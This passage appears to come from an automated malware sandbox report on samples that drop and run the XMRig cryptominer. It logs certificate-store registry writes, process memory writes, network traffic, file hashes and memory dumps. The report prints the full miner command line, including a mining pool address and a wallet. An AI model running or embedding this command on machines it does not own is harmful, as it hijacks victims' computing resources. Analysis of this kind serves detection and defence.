301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3368 wrote to memory of 3928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3368 wrote to memory of 3928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3928-16-0x000001EBA5F70000-0x000001EBA5F90000-memory.dmp
memory/3928-17-0x000001EBA78A0000-0x000001EBA78C0000-memory.dmp
memory/3928-18-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-20-0x000001EBA78E0000-0x000001EBA7900000-memory.dmp
memory/3928-19-0x000001EBA78C0000-0x000001EBA78E0000-memory.dmp
memory/3928-21-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-22-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-23-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-25-0x000001EBA78E0000-0x000001EBA7900000-memory.dmp
memory/3928-24-0x000001EBA78C0000-0x000001EBA78E0000-memory.dmp
memory/3928-26-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-27-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-28-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-29-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-30-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-31-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-32-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-33-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-34-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-35-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-36-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-37-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-38-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-39-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-40-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-41-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-42-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-43-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-44-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-45-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-46-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-47-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-48-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-49-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-50-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-51-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-52-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-53-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-54-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-55-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-56-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-57-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-58-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-59-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-60-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-61-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-62-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-63-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-64-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-65-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-66-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-67-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-68-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-69-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-70-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-71-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-72-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-73-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-74-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-75-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-76-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-77-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-78-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-79-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-80-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-81-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-82-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-83-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-84-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3884 wrote to memory of 3960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3884 wrote to memory of 3960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3960-16-0x000001C2AB930000-0x000001C2AB950000-memory.dmp
memory/3960-17-0x000001C2AB970000-0x000001C2AB990000-memory.dmp
memory/3960-18-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-20-0x000001C2AD270000-0x000001C2AD290000-memory.dmp
memory/3960-19-0x000001C2AB990000-0x000001C2AB9B0000-memory.dmp
memory/3960-21-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-22-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-25-0x000001C2AD270000-0x000001C2AD290000-memory.dmp
memory/3960-24-0x000001C2AB990000-0x000001C2AB9B0000-memory.dmp
memory/3960-23-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-26-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-27-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-28-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-29-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-30-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-31-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-32-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-33-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
